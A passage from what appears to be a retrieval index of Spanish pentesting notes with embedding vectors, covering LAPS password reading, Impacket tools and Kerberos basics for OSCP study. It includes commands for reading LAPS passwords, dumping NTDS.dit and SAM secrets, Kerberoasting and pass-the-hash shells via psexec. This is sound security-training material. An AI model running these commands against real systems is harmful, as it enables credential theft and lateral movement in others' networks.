0.06325, 0.04659, -0.04746, -0.09122, -0.0027, 0.03447, 0.02826, -0.08208, -0.02826, 0.04315, -0.07701, -0.03928, -0.01628, -0.02986, 0.04449, -0.06544, -0.01463, -0.0369, 0.04238, -0.00352, -0.00747, 0.07442, 0.00673, -0.057, 0.06261, -0.00323, -0.04645, -0.02832, 0.02525, -0.03954, -0.00101, 0.02445, -0.00965, -0.00741, -0.02554, -0.03543, -0.01539, 0.04274, -0.01807, 0.05375, -0.01422, -0.01146, 0.0052, 0.05042, -0.03841, -0.00275, 0.00715, 0.02148, -0.01037, -0.02856, 0.03073, 0.04944, -0.04165, -0.06261, 0.02063, 0.03499, -0.04219, -0.01384, -0.00054, 0.05295, 0.06692, 0.02109, 0.04873, -0.01015, -0.00476, 0.03623, 0.03663, 0.06227, -0.00764, 0.0438, 0.00846, -0.01718, 0.05741, -0.02444, -0.01057, -0.0352, -0.00162, -0.05534, 0.02634, 0.04006, 0.02113, 0.00253, -0.0893, -0.04302, -0.03254, -0.00075, -0.02657, -0.02687, 0.01277, -0.01214, 0.0008, -0.01341, -0.01979, 0.00876]} +{"tipo": "metodologia", "herramienta": "LAPS", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "v": [0.03149, -0.09042, -0.00247, -0.16515, -0.14548, -0.06295, -0.04552, -0.06552, -0.21298, 0.14611, 0.14961, -0.08766, 0.04065, -0.08591, -0.1353, -0.08485, 0.00561, -0.0098, 0.015, -0.01575, 0.04351, 0.09555, -0.23866, -0.04455, 0.0137, 0.17007, -0.00174, 0.01988, -0.07189, -0.07095, -0.16464, 0.08567, -0.23476, -0.01031, -0.10461, -0.00025, 0.09267, 0.11312, -0.02662, 0.22419, 0.06542, 0.10446, -0.06889, 0.03962, 0.0641, 0.00071, 0.03197, 0.08232, -0.03324, -0.03896, -0.07573, -0.06387, -0.11745, -0.0604, -0.01721, -0.01111, 0.08203, -0.06651, -0.01294, 0.07024, -0.04852, 0.11923, -0.04495, -0.03925, -0.07668, -0.04633, 0.0422, -0.08341, -0.02458, 0.00861, 0.03525, -0.03771, 0.02355, -0.05496, 0.10821, -0.0211, 0.00969, -0.06911, 0.18533, 0.0883, -0.08663, -0.01691, -0.0721, -0.05169, -0.06981, -0.01747, 0.0754, -0.00904, 0.06326, -0.02877, 0.08662, 0.07109, 0.04455, -0.056, -0.01769, -0.1139, -0.00413, -0.03444, -0.02423, -0.02221, -0.04339, 0.06768, -0.09657, 0.05816, -0.00828, 0.03342, 0.04306, 0.05054, 0.00041, -0.07041, 0.06904, -0.00745, -0.08274, -0.06099, 0.02888, 0.06804, -0.0608, -0.08959, -0.00723, -0.05025, 0.03058, 0.02824, 0.07214, -0.00649, -0.04971, 0.01653, -0.01228, 0.04467, -0.09623, 0.01626, -0.03518, -0.07902, 0.01489, -0.00554, -0.03315, 0.03731, -0.00312, 0.06384, -0.05141, 0.00133, -0.00137, -0.04629, 0.05292, 0.01614, 0.0492, 0.03943, 0.01638, -0.05993, -0.00761, -0.01143, 0.03349, -0.03194, 0.02625, -0.01965, 0.02242, 0.06608, -0.02502, -0.03775, -0.00403, 0.01518, 0.01017, 0.01102, 0.10056, 0.06875, -0.01665, -0.09098, 0.02778, -0.00327, 0.0312, -0.06838, 0.01863, -0.00194, 0.02932, -0.02624, 0.05184, -0.02565, 0.02293, -0.0347, -0.01072, -0.04269, -0.00991, -0.01339, -0.00285, -0.00885, -0.03126, -0.07115, -0.00847, 0.00239, 0.02301, -0.05084, -0.00737, -0.03228, 0.00746, 0.00871, 0.00696, -0.04507, 0.01566, -0.08253, -0.01778, -0.02169, -0.03563, -0.03563, -0.04596, -0.04862, 0.02491, -0.053, 0.02712, -0.00091, 0.02137, -0.06842, 0.003, 0.01284, 0.0178, -0.06412, -0.02527, 0.00701, 0.00378, 0.01301, -0.01918, -0.04434, -0.01875, 0.05842, 0.02469, 0.03138, 0.02319, -0.01948, 0.04164, -0.03444, 0.05182, -0.02305, 0.00229, 0.0026, -0.01467, -0.0263, 0.09338, -0.02806, -0.07708, -0.04241, -0.0277, -0.02819, 0.00149, -0.0165, 0.01883, -0.08137, -0.00691, -0.0161, -0.04421, 0.00835, -0.05172, 0.0282, -0.04388, -0.07572, -0.04495, -0.06008, -0.01088, 0.02451]} +{"tipo": "metodologia", "herramienta": "LAPS", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "texto": "## Cómo saber quién puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista → relacionado con ACL abuses.", "v": [-0.17243, 0.0039, 0.05452, -0.05275, -0.09175, -0.0324, 0.01826, 0.00407, -0.12, 0.10394, -0.06745, -0.13509, -0.09442, 0.1174, 0.17468, -0.05965, -0.06343, 0.09937, -0.11746, -0.03226, 0.03992, -0.02903, -0.19989, -0.01073, -0.03633, -0.01864, 0.11722, -0.02329, 0.04276, -0.02816, -0.23423, -0.0169, 0.03229, 0.10442, -0.01172, 0.05179, -0.06892, 0.07841, -0.00337, 0.34358, 0.03096, 0.10272, 0.04166, -0.06283, -0.01785, -0.06324, -0.15731, 0.00239, -0.04753, 0.05352, 0.02565, 0.03909, -0.16002, -0.07336, 0.02707, 0.02127, 0.12264, -0.02488, -0.04898, 0.03861, -0.09116, -0.02199, -0.06037, -0.03989, -0.03593, -0.04937, -0.02231, 0.01551, -0.07497, 0.08303, -0.07826, 0.08429, -0.03198, 0.05234, 0.005, -0.03793, 0.06, 0.06304, 0.16021, 0.04312, 0.03269, -0.01079, -0.04481, -0.05347, -0.02722, 0.03235, 0.07886, -0.03886, 0.05967, 0.02276, 0.06978, -0.01447, -0.0604, 0.07264, -0.03774, -0.07774, -0.02431, -0.05192, -0.03664, -0.01377, 0.02658, 0.05815, -0.08343, 0.08279, 0.00674, -0.02639, -0.04589, -0.02451, -0.03686, -0.06682, 0.04088, 0.065, -0.05797, 0.01097, 0.00345, 0.00861, 0.02886, 0.02248, 0.13724, -0.07049, -0.03781, 0.01369, 0.03379, 0.04185, 0.00792, -0.02004, 0.03914, 0.04795, -0.05004, 0.03455, -0.04129, 0.07755, -0.07902, -0.01939, -0.00879, -0.03176, -0.00666, -0.00062, -0.02914, -0.06126, 0.03551, 0.06113, 0.07109, 0.06115, -0.01209, -0.01053, 0.04011, -0.05048, -0.06255, 0.01739, 0.02362, -0.01933, 0.00684, 0.01727, 0.01426, -0.06557, 0.03247, -0.09323, -0.0253, 0.03392, -0.08759, 0.00613, -0.05005, 0.01819, -0.01754, 0.08743, 0.01641, 0.03235, -0.0089, -0.04705, 0.03429, 0.02513, -0.0655, 0.05328, 0.02438, -0.07929, 0.02404, -0.09317, -0.01753, -0.07512, -0.1059, 0.005, -0.05182, 0.03291, 0.04405, -0.06473, 0.03774, -0.02623, -0.01041, 0.03717, 0.02176, 0.0217, 0.04195, -0.00481, -0.03942, -0.0112, -0.01974, -0.00686, 0.03552, -0.06017, 0.00805, -0.05887, -0.02016, 0.00952, 0.00342, -0.0181, 0.00385, 0.04933, -0.05297, 0.03421, 0.03696, -0.03122, 0.02693, -0.02156, -0.02589, -0.00534, -0.07899, -0.0257, -0.06422, 0.03173, 0.09063, 0.07844, 0.07441, 0.02212, -0.01554, 0.05443, 0.04699, -0.03297, 0.06938, 0.0378, -0.0503, 0.05844, -0.0604, 0.00791, -0.0018, 0.02013, -0.01059, -0.02893, -0.0212, -0.0458, 0.0404, 0.04341, 0.02342, -0.05187, -0.04473, -0.09858, -0.09008, 0.0243, 0.00304, -0.0351, -0.00652, -0.00315, 0.02303, -0.00446, 0.02874, -0.01165]} +{"tipo": "metodologia", "herramienta": "LAPS", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "texto": "## Resultado\nPassword de admin local de esa máquina → Movimiento lateral / RDP.\n\nRelacionado: BloodHound · OSCP MOC", "v": [-0.25208, -0.08159, 0.10953, -0.26711, -0.17336, -0.02328, -0.05623, 0.04614, -0.07371, 0.0536, -0.00762, -0.09155, 0.14581, -0.09562, 0.03301, -0.02477, 0.04785, 0.02833, -0.07438, -0.04736, -0.04079, -0.05072, -0.07403, 0.09186, 0.1852, 0.11496, -0.02006, 0.074, -0.11686, -0.15725, -0.00137, -0.05091, -0.06067, 0.0682, -0.07068, 0.02035, 0.04473, 0.02015, 0.03449, 0.14558, -0.0096, 0.03697, -0.10906, 0.03707, 0.15001, -0.02148, 0.06632, 0.03422, 0.04513, 0.01653, -0.05576, -0.04086, -0.13139, -0.03032, -0.00036, -0.00166, 0.05109, -0.03206, 0.03017, 0.00208, -0.055, 0.04115, -0.08631, -0.06184, -0.06899, -0.00908, -0.01579, -0.04845, -0.01246, 0.05805, -0.04341, 0.1243, -0.04813, -0.02186, -0.02024, -0.02965, 0.10441, 0.02919, 0.23261, 0.05005, -0.06625, 0.01045, 0.02678, -0.02219, -0.06319, -0.02966, 0.16274, -0.04737, 0.08671, -0.00347, 0.05051, -0.01971, -0.05588, 0.04591, 0.02863, -0.15005, -0.04078, -0.03809, -0.07181, -0.07216, 0.00236, 0.11552, -0.00045, 0.01676, 0.05126, -0.08062, 0.03573, 0.00257, 0.07316, -0.01603, 0.09191, -0.04947, -0.03322, 0.06312, -0.06779, -0.02192, 0.08555, 0.02111, 0.00721, 0.00869, -0.06094, 0.10433, 0.07562, -0.08271, -0.11656, 0.00412, 0.0292, 0.02262, -0.07131, 0.03812, 0.01075, 0.02751, -0.08784, -0.01914, -0.08531, 0.0459, 0.0599, -0.02208, 0.06822, -0.06007, -0.06877, -0.04294, 0.03013, 0.02001, 0.06741, 0.00862, 0.04101, -0.03567, -0.00197, 0.01838, 0.05982, -0.04943, 0.01572, -0.05133, -0.00263, 0.03032, -0.0434, -0.02954, -0.04853, 0.02397, -0.057, -0.00842, -0.07528, 0.00564, -0.08188, 0.03226, 0.02292, 0.08816, 0.00334, -0.12427, 0.00241, 0.00042, -0.03183, 0.05165, -0.02726, -0.03871, 0.05546, -0.05882, -0.03556, 0.00592, 0.02002, -0.02402, 0.01838, -0.0225, 0.07615, 0.0023, 0.06975, -0.01667, 0.01753, -0.0758, 0.05324, -0.0307, -0.00211, -0.00536, -0.01455, -0.03775, 0.05768, -0.06807, 0.01732, -0.00204, -0.0308, -0.01096, -0.04567, 0.01096, 0.00534, -0.01654, 0.03284, 0.00475, -0.08276, -0.01871, -0.02019, 0.00388, 0.01717, -0.0207, -0.01017, 0.038, -0.00513, 0.02029, -0.01875, -0.00106, 0.04616, -0.01677, 0.00352, 0.03857, 0.01639, -0.05475, -0.01271, 0.01126, 0.0281, -0.04166, 0.00332, 0.0314, -0.04156, -0.03266, 0.03447, 0.02795, -0.00815, -0.02533, -0.01679, -0.02965, 0.06165, -0.03012, 0.08508, -0.037, -0.07996, -0.01246, -0.02811, -0.058, 0.00065, 0.02878, 0.01755, -0.02733, -0.02478, 0.00468, 0.02012, 0.04632]} +{"tipo": "metodologia", "herramienta": "Impacket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "v": [-0.10828, -0.19857, 0.0206, -0.09698, -0.01662, -0.31085, -0.0045, -0.02854, 0.04306, -0.02383, -0.06754, 0.00922, 0.07052, -0.05202, -0.12352, 0.09917, -0.15396, -0.08426, 0.12567, 0.00103, 0.0154, 0.07742, -0.14333, 0.01725, 0.06365, 0.10557, 0.02996, 0.05203, -0.05489, 0.00514, 0.01854, 0.04168, -0.03714, -0.07478, -0.09226, -0.01894, -0.09405, 0.14897, 0.09535, 0.03951, 0.00033, 0.17134, -0.01773, 0.08685, 0.01785, -0.03414, 0.11706, -0.05885, 0.08423, 0.02308, -0.03538, -0.04061, -0.01697, 0.00427, 0.07684, -0.08665, 0.07101, 0.06091, 0.00205, 0.02061, -0.00202, 0.1097, -0.0368, -0.00947, 0.06032, -0.04016, 0.02007, -0.03437, -0.07571, 0.0949, -0.09102, 0.0189, 0.07375, -0.02088, 0.1032, -0.00428, -0.13922, -0.09005, 0.10573, 0.05102, 0.02661, -0.01092, 0.03291, -0.01699, 0.00088, -0.18543, 0.00131, -0.08518, 0.01677, -0.04972, 0.12995, -0.00201, -0.06262, 0.11597, 0.08737, -0.05763, 0.02373, 0.02543, 0.05555, 0.15798, -0.01112, -0.04954, -0.04691, 0.06335, -0.06232, 0.06988, 0.06992, -0.08328, 0.0344, -0.04892, 0.05127, 0.05884, -0.03804, -0.03118, -0.10957, -0.0725, 0.01139, -0.07496, -0.00747, 0.03707, -0.0557, 0.01016, -0.08755, -0.00083, -0.05365, -0.08849, -0.035, 0.07715, -0.03481, -0.00049, 0.03128, 0.02976, -0.04552, -0.02773, -0.05403, 0.09379, -0.02282, 0.01407, 0.05992, -0.01994, 0.06107, 0.05521, 0.01867, 0.05631, 0.02432, 0.04051, 0.09911, 0.01221, -0.08073, 0.01118, 0.10751, 0.00916, -0.05231, 0.04247, -0.05662, -0.02531, -0.03502, 0.0958, 0.03959, -0.00885, 0.0224, 0.04288, -0.00109, -0.00197, 0.07724, 0.00387, -0.06222, 0.03466, 0.03374, -0.0435, -0.00693, 0.05131, 0.01026, -0.01078, -0.01726, -0.00588, 0.09448, -0.0264, -0.06432, -0.01993, -0.0991, -0.01138, -0.0026, -0.02765, -0.01933, 0.02683, -0.01781, 0.07359, -0.05889, -0.01098, -0.03095, 0.0203, 0.04358, -0.0694, -0.00329, -0.0165, -0.02762, -0.01775, 0.06105, 0.01156, -0.06218, 0.03889, -0.02011, -0.06224, 0.08827, 0.04248, -0.04405, 0.02816, 0.02236, 0.07835, 0.02116, -0.00128, 0.00338, -0.00785, -0.03362, -0.07072, 0.01283, 0.0163, 0.05094, -0.00312, -0.00653, 0.01902, 0.05797, 0.00556, -0.02657, -0.02031, -0.08363, -0.00209, 0.01026, -0.00835, -0.00175, 0.05328, 0.00494, -0.01793, 0.02603, 0.05113, -0.00954, -0.02646, -0.04032, -0.05058, -0.0331, 0.00464, -0.02145, -0.11446, -0.02765, -0.03888, -0.04472, 0.00592, 0.00051, -0.00958, -0.00068, -0.01177, -0.02139, -0.04631, -0.05093, 0.04096]} +{"tipo": "metodologia", "herramienta": "Impacket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "texto": "## Los más útiles\n```\nimpacket-psexec → shell en la víctima si tienes creds (estilo PsExec)\nimpacket-wmiexec → ejecutar comandos sin tocar disco\nimpacket-smbexec → otra ejecución remota\nimpacket-secretsdump → vuelca NTDS.dit y SAM de un DC en remoto → secretsdump\nimpacket-GetUserSPNs → Kerberoasting\nimpacket-GetNPUsers → AS-REP Roasting\nimpacket-getTGT → pide/forja un TGT con cred conocida\nimpacket-getST → pide un service ticket\nimpacket-smbserver → share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx → relay NTLM\nimpacket-ticketer → forja tickets → Golden Ticket\n```", "v": [-0.20463, -0.25522, -0.20649, -0.13125, 0.00846, -0.16597, -0.05278, 0.07933, 0.0349, 0.12855, -0.1656, 0.04024, 0.09729, -0.09491, 0.04624, 0.0755, -0.05822, -0.00269, 0.15246, -0.05738, 0.02098, 0.06037, -0.03662, -0.09635, 0.12745, 0.17966, 0.01875, 0.13757, -0.0545, 0.0415, 0.03023, -0.07373, -0.09052, -0.12801, 0.05137, -0.12503, 0.0652, -0.07619, 0.1342, 0.12011, 0.07793, 0.05561, -0.1004, 0.10505, -0.06114, -0.10594, 0.02448, 0.04597, 0.07014, -0.17224, 0.02056, -0.0468, -0.16164, -0.03322, -0.04172, -0.02071, 0.10875, 0.00593, -0.034, 0.11049, 0.00329, 0.03525, 0.00855, 0.04006, 0.0801, -0.03136, 0.05198, -0.10347, -0.04298, -0.00803, -0.10185, 0.00908, 0.13671, 0.00218, -0.04128, -0.06337, 0.02854, -0.01004, 0.08426, 0.14321, 0.03703, -0.01219, -0.08177, -0.01007, -0.05254, -0.06313, 0.07308, -0.00152, 0.01656, 0.00652, 0.05169, -0.03814, -0.01027, 0.06419, 0.06276, -0.04421, 0.00446, -0.04839, -0.04106, -0.05029, -0.02477, -0.02786, -0.03373, 0.02103, -0.09307, -0.05272, 0.00293, 0.03388, 0.02677, 0.08412, 0.11447, 0.06585, 0.06028, 0.04242, 0.04746, -0.05106, 0.04125, -0.02351, 0.04652, -0.00834, 0.01348, 0.00877, 0.05339, -0.03524, 0.0194, -0.01956, 0.02399, 0.03699, 0.06596, -0.03332, -0.04974, -3e-05, 0.0178, 0.04705, 0.06696, -0.05271, -0.04814, -0.00654, -0.02851, 0.01737, 0.04151, -0.01055, -0.01689, 0.12954, -0.03051, 0.00291, 0.00603, 0.03177, 0.00248, -0.00191, 0.13041, 0.01191, -0.02421, 0.03689, 0.03686, -0.00169, -0.01006, -0.07524, -0.05756, -0.01689, 0.00874, 0.0091, -0.03122, 0.02225, 0.02394, -0.01552, 0.03097, -0.03078, -0.00819, 0.04083, -0.03453, 0.00146, 0.06312, 0.02183, -0.00855, -0.06484, 0.02095, -0.02792, 0.05348, -0.06591, 0.0245, -0.0073, 0.0371, 0.05031, 0.03388, -0.05179, 0.03615, -0.01233, -0.04367, -0.05526, 0.02449, 0.01541, 0.05209, -0.03899, 0.00654, -0.00536, 0.02973, -0.03124, -0.01971, 0.06692, -0.01933, -0.02209, -0.01276, -0.0729, 0.02019, -0.03157, -0.02835, 0.02141, -0.04055, 0.0461, 0.06219, -0.00342, 0.02875, -0.06915, -0.03884, 0.00054, -0.00513, 0.05829, -0.03146, 0.01747, -0.02225, 0.01005, 0.01244, -0.02717, 0.02002, 0.01513, 0.01183, -0.01414, 0.04928, 0.00125, 0.0182, 0.05183, -0.00112, 0.02483, 0.01057, 0.01418, -0.02228, 0.01699, -0.01624, 0.04928, -0.01024, 0.00299, -0.00651, -0.02937, 0.00529, 0.04167, -0.0566, 0.02327, 0.04376, -0.00044, 0.02489, -0.04345, -0.06299, -0.01773, -0.02515, 0.0425]} +{"tipo": "metodologia", "herramienta": "Impacket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra máquina, autenticado y limpio → Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz · Active Directory · OSCP MOC", "v": [-0.10172, -0.19236, 0.00288, -0.0715, -0.06006, -0.16028, -0.23912, 0.00293, -0.11615, 0.22713, -0.02814, 0.04695, 0.06565, 0.00111, 0.1211, 0.06431, -0.0079, -0.02614, -0.11689, -0.00473, -0.00412, 0.0527, -0.14854, 0.06843, 0.08629, 0.05099, -0.03085, 0.03287, -0.23275, -0.10353, -0.01599, -0.05504, -0.10624, 0.06379, 0.03132, 0.0398, -0.03284, -0.03136, 0.0765, 0.16846, 0.00442, 0.15627, -0.08424, 0.16527, 0.13073, -0.06781, 0.05127, -0.0153, 0.07903, -0.10389, -0.04254, -0.04119, -0.23914, 0.03562, 0.06226, -0.01001, 0.08484, 0.02437, -0.06198, -0.03388, 0.01734, 0.02781, 0.00234, -0.05415, -0.00161, -0.0199, -0.00288, -0.12588, -0.03668, 0.07386, -0.06779, 0.08255, 0.11682, 0.00437, 0.01995, 0.05088, 0.10854, -0.03592, 0.08519, 0.09835, -0.04524, -0.07814, 0.04102, -0.03574, -0.07051, -0.022, 0.04542, -0.05541, 0.03365, 0.00918, 0.03285, -0.00235, -0.04209, 0.03228, -0.00807, -0.02488, -0.05388, -0.01094, -0.06653, 0.0208, -0.04043, -0.03212, 0.00393, 0.08288, -0.00462, 0.01164, 0.00857, 0.04829, 0.08748, 0.10244, 0.08244, -0.09351, 0.04692, 0.01153, -0.01697, -0.00914, -0.05436, -0.00637, -0.06029, -0.00632, 0.00073, 0.06487, 0.11106, -0.0253, 0.01123, -0.07549, -0.05423, 0.12269, -0.02148, -0.01291, 0.03934, -0.00687, -0.0196, 0.02097, -0.00314, -0.00717, 0.01276, 0.05784, 0.00698, -0.09823, 0.02543, 0.04798, 0.01131, 0.02187, 0.05772, 0.0456, 0.07904, -0.05194, -0.06315, 0.03224, 0.05726, 0.02114, 0.04828, -0.01187, -0.02993, 0.03863, 0.0015, -0.0236, -0.09566, -0.02187, 0.02225, 0.01412, -0.01607, 0.02076, -0.03969, 0.09061, 0.01653, -0.00501, 0.00352, -0.03759, -0.03595, 0.00625, -0.03053, 0.03563, -0.00842, -0.01421, 0.08017, -0.02298, 0.00491, -0.03952, 0.04708, -0.07546, 0.02684, -0.04192, 0.04823, 0.0271, -0.02217, 0.06106, 0.00751, -0.02079, 0.02148, -0.00941, 0.00627, 0.01171, 0.00194, 0.00773, 0.04598, -0.04521, 0.0396, 0.05912, 0.02909, 0.0445, 0.03728, -0.07546, 0.04947, -0.00317, -0.03997, 0.03258, 0.01484, 0.00594, 0.02179, 0.03674, 0.02821, -0.0127, -0.05435, -0.05139, 0.0091, -0.01075, 0.02697, 0.01026, 0.01711, 0.01136, 0.03197, 0.06085, 0.00793, -0.02641, 0.00363, 0.02304, 0.03923, -0.02186, -0.0472, 0.00091, -0.03646, -0.04425, 0.01279, 0.01926, -0.00697, -0.03246, -0.07554, -0.05057, -0.01472, 0.05983, 0.03018, -0.05054, -0.02627, 0.00173, 0.01332, 0.02268, -0.01051, -0.03318, -0.04257, -0.03882, -0.0174, -0.11118, 0.02781, 0.09457]} +{"tipo": "metodologia", "herramienta": "Kerberos", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "texto": "# Kerberos\n\n> El protocolo de autenticación de Active Directory. Entender TGT vs TGS desbloquea media AD.", "v": [-0.20476, -0.16406, -0.037, 0.00048, 0.06075, 0.02019, 0.01004, 0.0886, -0.07564, 0.18961, -0.01106, 0.04541, -0.00683, -0.05058, 0.2085, -0.05643, 0.07831, -0.14436, 0.2006, -0.02683, 0.06797, 0.09414, -0.0616, -0.09394, 0.22048, -0.05873, -0.11312, -0.03933, 0.05247, 0.00923, 0.00445, -0.03016, -0.03948, -0.06487, 0.00874, 0.05603, -0.06445, 0.14979, 0.0496, 0.15586, -0.07668, -0.01805, -0.07429, -0.00646, 0.05506, -0.00727, 0.06229, -0.04543, -0.00622, 0.02014, -0.04042, -0.02397, -0.07486, -0.02939, -0.05819, 0.04183, 0.15135, 0.00856, -0.12821, 0.05707, 0.0444, -0.20693, -0.06668, -0.01937, -0.06857, -0.13594, 0.09756, -0.06515, -0.09515, 0.00206, -0.02647, 0.0467, 0.08931, -0.01399, 0.09216, -0.06369, -0.08232, 0.09622, 0.02434, 0.14348, -0.07923, -0.00407, 0.11376, 0.07453, -0.15124, -0.06661, -0.08475, -0.02429, -0.01555, -0.05141, 0.02247, 0.09278, -0.08558, 0.00194, 0.07438, -0.1234, -0.06492, 0.03693, 0.09648, -0.01018, -0.05782, -0.07886, -0.00676, -0.02949, 0.00833, 0.0257, -0.05236, -0.03085, 0.04145, -0.00981, 0.02102, 0.02976, 0.04893, 0.01183, 0.02852, 0.16228, -0.07926, -0.04209, 0.05207, 0.057, -0.07116, -0.01081, 0.00489, -0.00271, -0.00279, 0.01637, -0.04132, 0.05364, -0.02742, 0.03328, 0.02073, 0.08384, -0.05927, -0.05346, -0.06597, -0.04813, -0.05588, 0.0414, -0.05048, -0.03416, -0.03557, 0.0253, -0.05461, 0.07152, 0.0365, -0.01342, 0.01395, -0.02887, -0.08084, 0.11216, 0.0336, 0.01695, -0.07338, -0.0364, -0.00338, -0.00777, -0.07695, -0.05499, -0.05283, 0.01968, -0.04095, -0.01239, 0.00574, 0.02646, -0.00925, 0.01967, -0.02203, -0.05774, 0.0244, -0.00199, 0.05585, 0.00928, 0.04452, -0.05613, -0.01583, 0.00855, 0.0116, -0.01221, -0.0187, -0.00431, 0.0141, -0.01942, 0.01358, -0.03471, 0.05843, 0.05664, 0.0045, -0.00598, -0.01187, -0.04205, 0.0194, -0.01757, -0.02478, 0.00218, 0.01829, -0.01434, 0.07067, -0.02453, -0.02872, 0.00287, -0.01342, 0.02601, 0.03505, -0.02922, 0.06561, 0.03048, -0.01849, 0.06445, 0.02518, 0.00986, 0.01152, 0.00339, 0.03353, -0.00765, -0.07809, -0.00346, -0.02139, -0.0393, 0.01736, 0.00719, -0.04173, -0.01444, -0.00796, -0.01807, -0.01983, -0.01027, 0.00423, -0.04638, 0.00345, -0.05051, 8e-05, -0.00248, 0.04218, 0.03368, -0.01843, 0.0669, -0.0356, 0.02473, 0.00635, -0.00347, 0.01774, -0.01352, -0.00807, 0.01664, 0.01481, -0.04675, -0.04676, -0.012, 0.03236, -0.01417, -0.02951, -0.03056, -0.05684, 0.05036, -0.05286, -0.03278]} +{"tipo": "metodologia", "herramienta": "Kerberos", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "texto": "## En 30 segundos\n```\nUsuario --(¿pwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "v": [-0.23253, -0.25188, -0.02933, -0.03922, 0.06782, -0.15713, -0.03186, 0.13974, 0.06712, 0.1588, -0.09371, -0.11808, -0.06527, -0.13407, -0.0867, -0.08408, 0.20066, -0.07915, 0.08598, 0.00281, 0.09719, -0.02535, 0.03983, 0.04663, 0.06165, 0.02966, -0.07919, -0.07599, -0.08835, -0.0296, 0.14626, -0.03268, -0.09988, -0.15583, -0.03119, -0.05458, 0.00962, 0.16411, 0.09779, 0.15473, 0.08346, -0.01245, -0.10217, 0.10967, 0.0166, -0.09772, 0.10882, 0.05032, -0.05206, -0.08697, -0.02023, -0.03839, -0.03318, 0.01729, -0.05204, -0.054, 0.11558, 0.01041, 0.02089, 0.03586, 0.04588, -0.04039, -0.01566, 0.01514, -0.04059, -0.04484, 0.09487, -0.02178, -0.08606, 2e-05, -0.18828, 0.04227, 0.12497, -0.10881, 0.0239, 0.01949, 0.07218, 0.00381, 0.07573, 0.01936, -0.04489, 0.00123, -0.02168, -0.05501, -0.02886, -0.04847, 0.06633, -0.03018, -0.04726, 0.00789, 0.0476, 0.05513, 0.02902, 0.03399, 0.08911, -0.13165, -0.01309, 0.00347, 0.0044, -0.06982, 0.03017, 0.06646, -0.02008, 0.03028, -0.03919, 0.03174, 0.09389, 0.01852, -0.02223, 0.03431, 0.0861, 0.08553, 0.01663, 0.02153, -0.0214, 0.04921, -0.05934, 0.01228, 0.03909, -0.00145, -0.02826, -0.01209, 0.0387, -0.05762, 0.02377, -0.06144, -0.06422, 0.01921, -0.06049, -0.03114, 0.06937, 0.0013, -0.09847, -0.01916, -0.01937, -0.00213, 0.0481, -0.03523, 0.00378, 0.06759, 0.03269, 0.05423, 0.01256, 0.01013, 0.08298, 0.009, 0.0329, -0.07122, -0.06217, -0.02521, 0.0703, 0.02088, -0.00843, -0.00999, 0.06551, -0.01087, 0.02658, -0.03316, -0.02268, -0.06606, -0.0044, 0.08787, 0.0305, 0.02795, 0.00295, -0.04118, 0.01668, -0.01493, 0.00523, -0.0433, 0.00483, -0.02489, 0.02413, -0.00296, 0.02229, -0.10419, 0.04539, -0.09831, 0.04119, -0.06135, 0.06836, -0.03064, 0.01627, 0.01174, 0.00295, -0.0003, 0.03717, -0.04361, 0.07008, -0.01766, 0.04, 0.02429, 0.00489, -0.1031, -0.01101, -0.01048, 0.00015, -0.04193, -0.03713, -0.05214, -0.01924, 0.00618, -0.03393, -0.01142, 0.07099, -0.04805, 0.03546, 0.08554, -0.02081, -0.0091, 0.0105, 0.01851, 0.04157, -0.06827, -0.00272, 0.01066, -0.06186, 0.02917, 0.00589, -0.04413, -0.07223, 0.05685, 0.03088, 0.02605, -0.00621, -0.03777, 0.07472, -0.01162, 0.06431, 0.01986, -0.00129, 0.02752, 0.03658, -0.04039, 0.04572, 0.0275, -0.04733, -0.0065, -0.04773, 0.00427, -0.00327, -0.00278, 0.00449, 0.045, -0.03671, -0.05648, -0.02912, 0.00079, 0.01097, -0.00706, 0.00572, -0.06561, -0.01037, -0.04533, -0.0418, -0.0262]} +{"tipo": "metodologia", "herramienta": "Kerberos", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "v": [0.01251, -0.1984, -0.117, -0.02043, 0.06429, -0.22167, 0.05019, 0.29221, -0.02324, 0.01479, -0.13285, -0.01927, 0.04761, 0.0094, 0.05241, 0.03493, 0.11827, -0.121, 0.01957, 0.03849, 0.0587, -0.05606, 0.07895, -0.03209, -0.02691, -0.04921, 0.03746, -0.09382, -0.10842, 0.15775, 0.06889, -0.12531, -0.10229, -0.0796, 0.01691, -0.11549, -0.02371, 0.16429, 0.0207, 0.04513, 0.1274, -0.01771, 0.02583, 0.1692, 0.06658, -0.11757, 0.09592, 0.01551, -0.09773, -0.01385, -0.06547, 0.00152, -0.03612, -0.05021, -0.03387, 0.01525, 0.09774, 0.02942, -0.01702, 0.0412, 0.09605, -0.08878, -0.09201, 